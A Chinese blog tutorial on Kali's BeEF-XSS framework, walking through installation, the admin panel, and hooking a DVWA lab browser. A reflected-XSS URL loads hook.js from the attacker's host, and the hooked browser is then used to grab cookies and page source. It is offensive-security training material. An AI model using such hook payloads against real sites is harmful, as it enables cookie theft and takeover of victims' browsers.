2021Kali系列 -- XSS漏洞(Beef-xss)

最新推荐文章于 2024-07-27 10:11:42 发布
最新推荐文章于 2024-07-27 10:11:42 发布
阅读量1.9k 收藏 12
点赞数 1
分类专栏: web安全工具库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/115709216
版权

XSS攻击 Beef-xss 网络安全 cookies获取 控制目标主机
关键词由CSDN通过智能技术生成

​当我不欠任何人的时候,我就只欠我自己了。。。

---- 网易云热评

一、安装beef-xss

输入beef-xss,提示安装,输入y

二、启动beef-xss

三、访问登陆页面:

http://192.168.139.133:3000/ui/panel

四、让目标主机访问存在生成的钩子代码

http://192.168.139.129:81/dvwa/vulnerabilities/xss_r/?name=<script src="http://192.168.139.133:3000/hook.js"></script>

五、获取控制权限

绿色模块:表示模块适用当前用户,并且执行结果对用户不可见

红色模块:表示模块不适用当前用户,有些红色模块也可以执行

橙色模块:模块可用,但结果对用户可见

灰色模块:模块为在目标浏览器上测试过

1、获取cookies

2、获取网页源码

3、让目标主机弹出提示信息

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

web安全工具库
关注
专栏目录
Kali [BeEF-XSS]XSS利用工具
weixin_45253622的博客
03-29 4399
BeEF-XSS的使用 BEEF (The Browser Exploitation Framework):一款浏览器攻击框架,用Ruby语言开发的,Kali默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。 安装 linux安装 apt-get update apt-get install beef-xss 启动Apache并打开beef service apache2 start beef-xss #打开 打开beef需要设置密码,默认密码和用户名都为beef 第二个框是示例payloa
漏洞扫描(kali beef-xss、DNSlog、CSRF、SSRF)
m0_61506558的博客
08-04 1594
并且其中的内容会被服务器端执行,插入的代码可能导致任意文件读取、系统命令执行、内网端口 探测、攻击内网网站等危害。,'.yourid.ceye.io/jinyiuxin'))),1,0) 黑体处拼接SQL语句。gopher协议:是一种信息查找系统,只支持文本,不支持图像,已被HTTP替代。第三方网站利用被攻击网站生效的cookie,直接对服务器接口发起请求。抓取正常通信请求的数据包,再请求一次。.........
Kali beef-xss实现Xss详细教程。
sunwanfulove的博客
09-28 3512
Kali beef-xss实现Xss详细教程。
Kali下安装与使用BeEF:反射型与存储型XSS攻击、Cookie会话劫持、键盘监听及浏览器操控技巧
最新发布
xt350488的博客
07-27 1022
更常见的称呼是BeEF(The Browser Exploitation Framework),是一个开源的浏览器漏洞利用框架。它由Michał Zalewski于2006年创建,旨在帮助渗透测试人员评估Web浏览器的安全性,发现并利用其中的漏洞
Kali安装beef-xss
qq_58000413的博客
08-10 2289
不更新可能会出现下面的情况:metasploit-framework : 依赖: ruby (< 1:2.8) 但是 1:3.0+1kali1 正要被安装。#把192.168.199.129替换成本机IP。
kali BeEF-XSS的使用
weixin_45605352的博客
06-02 1587
0x00 BeEF简介 BeEF是The Browser Exploitation Framework的缩写。它是一种专注于Web浏览器的渗透测试工具。 beef管理,挂钩web浏览器的过程: 生成交互 payload 的 hook; 服务器端:beef 作为服务端管理,管理访问运行了 hook 的客户端; 客户端:运行与客户端浏览器的 js 脚本,也就是 beef 生成的 payload; beef 将运行了 hook 的 web 浏览器钩住,进行管理 0x01 攻击手段 配合xss,将hook插入
kali新手入门教学(7)--beef-xss的安装,配置,debug
azraelxuemo的博客
05-14 4222
beef-xss的路径是在/usr/share/beef-xss cd /usr/share/beef-xss ls 然后有个配置文件config.yaml 修改这个文件 vi config.yaml 找到user和password然后修改,beef不允许默认用户名密码登录 然后找到metasploit,改为true 保存退出 cd extensions cd metasploit 然后修改这里面的config.yaml 1.enable改成true 2.host和callback_host改成当前主机
kali-beef工具(xss-stored)
Vincent0sen的博客
09-06 510
kali工具之beef-xss
beef-xss安装与使用
Bu2n的博客
12-07 3431
文章目录kali安装与更新软件源beef-xss安装快速上手beef-xss kali安装与更新软件源 传送门 beef-xss安装 sudo apt-get install beef-xss sudo beef-xss 第一次启动beef要修改密码,要仔细看清楚 快速上手beef-xss http://127.0.0.1:3000/ui/panel beef的管理面板 输入自己的账号密码默认beef beef 这样就能进入到管理页面 查看kali的ip地址 构造下面js代码,想办法给其他人
kali安装keylogger_Kali Linux启动Beef-Xss漏洞利用框架教程:
weixin_35515918的博客
12-24 366
注:首先将默认浏览器的IP地址设为本机回环代理地址,IP格式:127.0.0.1,Port:8080,勾选Socks5,勾选Remote DNS,设置完成!root@kali:~# cd /user/share/beef-xssroot@kali:~# beef-xss注:开启后自动跳转到Beef登录界面,链接:http://127.0.0.1/3000/ui/authentication,默认用...
kali xss漏洞扫描工具使用教程
weixin_49071539的博客
11-19 2840
xss漏洞扫描教程 git clone https://github.com/hahwul/XSpear.git cd XSpear/ ls gem sudo gem install XSpear-1.4.1.gem (往后版本可能会更新,根据文件夹里的版本进行下载) XSpear -u “http://test.php.vulnweb.com/listproducts.php?cat=123” -v 1 注:https://bit.ly/35NOnDS 这是一个极易受攻击的安卓实验室!!! ...
XSS另类攻击(四)kali系统beef-xss安装和使用
06-01 1006
本文介绍kali系统beef-xss安装、异常情况解决、使用示例说明。
kali2021安装beef-xss和使用
qq_53365842的博客
03-29 3426
安装beef:apt install beef-xss 切换到beef目录(kali版本不同,beef配置文件位置不同): cd /etc/beef-xss/config.yaml 或者 cd /usr/share/beef-xss/config.yaml 打开配置文件: vim /etc/beef-xss/config.yaml / vim /usr/share/beef-xss/config.yaml 修改密码和修改host值,改成kali的IP地址 启动beefbeef-xss/beef
Kali Linux渗透测试 098 手动漏洞挖掘-XSS 漏洞
kevinhanser
03-26 3874
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 简介与 Java 原因无关 命名完全出于市场原因 使用最广的客户端脚本语言 利用方法通过 WEB 站点漏洞,向客户端交付恶意执行代码,实现对客户端的攻击目的 注入客户端脚本代码 盗取 cookie
linux-kali利用BeEF 执行 XSS 攻击
LCH14777475118的博客
06-26 327
文件,在文件里面找到这两串代码。软件(下载最新版的就可以),复制为一个副本,将副本修改为。安装目录中启动它(注意:新的。软件可以用来进行站点搭建。就勾上了靶机所在的浏览器了。,双击从记事本里面打开。,或者可以在配置文件。
渗透测试工具:跨站脚本漏洞检测---Xsser
gao646467783的博客
01-27 3705
文章目录简介:用法:(一)、Options:(二)、特别的用法:(三)、选择目标:(四)、 现测HTTP/HTTPS的连接类型:(五)、 配置请求:(六)、 系统验校器:(七)、 选择攻击向量(s):(八)、选择Bypasser(s):(九)、 特殊的技巧:(十)、 Select Final injection(s):(十一)、 Special Final injection(s):(十二)、 混杂模式:(十三)、 Reporting:(十四)、Miscellaneous: 简介: 跨站脚本者是一个自动框架
Kali Linux-网络安全之-XSS 跨站脚本攻击原理及 DVWA 靶机的搭建
xueshenlaila的博客
12-31 1380
XSS 跨站脚本攻击 使用 JavaScript 创建 Cookie JavaScript 可以使用 document.cookie 属性来创建 、读叏、及删除 cookie。 例 1:JavaScript 中,创建 cookie 如下所示: document.cookie=“username=John Doe”; 例 2:你还可以为 cookie 添加一个过期时间(以 UTC 戒 GMT 时间)。默认情况下,cookie 在 浏览器关闭时删除: document.cookie=“username=John
kali渗透测试之Web渗透-XSS-漏洞利用-键盘记录器,xsser
hacker3062的博客
09-15 407
进行html编码,目前最有效的方法(并非完全不可绕过【不需要尖括号的情况:如】)】{可用burpsuite进行编码}-v:显示详细信息;–heuristic  探测服务器,检查被过滤的字符(会发送大量请求){脑洞:sql}  【所有过滤机制都是基于字符过滤】伪造诱人连接{如:限时抢购门票、手机等},转到存在xss漏洞的页面【主要危害为登录页面】,窃取用户登录账号密码。可使用图形化界面  xsser --gtk  【不建议使用,界面不够友好】:将对应页面和参数写进**-g**参数中;
云服务器上搭建beef-xss
03-11
在云服务器上搭建beef-xss(Browser Exploitation Framework)可以用于进行Web浏览器漏洞利用和XSS攻击的测试和研究。下面是一些步骤来搭建beef-xss: 1. 选择云服务器:首先,你需要选择一个云服务器提供商,如阿里云、腾讯云等,并创建一个适合你需求的云服务器实例。 2. 安装操作系统:在云服务器上安装一个支持beef-xss的操作系统,常见的选择是Linux发行版,如Ubuntu、CentOS等。 3. 安装依赖软件:在操作系统上安装必要的软件和工具,如Ruby、RubyGems、Node.js等。具体的安装步骤可以参考beef-xss的官方文档。 4. 下载beef-xss:从beef-xss的官方网站或GitHub仓库下载最新版本的beef-xss。 5. 配置beef-xss:根据你的需求,编辑beef-xss的配置文件,设置监听IP地址、端口号等参数。 6. 启动beef-xss:运行beef-xss的启动命令,启动beef-xss服务。 7. 配置防火墙和网络:确保云服务器的防火墙和网络设置允许外部访问beef-xss服务。 8. 测试和使用:使用Web浏览器访问云服务器的IP地址和端口号,进入beef-xss的管理界面,开始进行漏洞测试和XSS攻击。 请注意,在进行任何安全测试和攻击活动之前,确保你已经获得了合法的授权,并且遵守法律和道德规范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值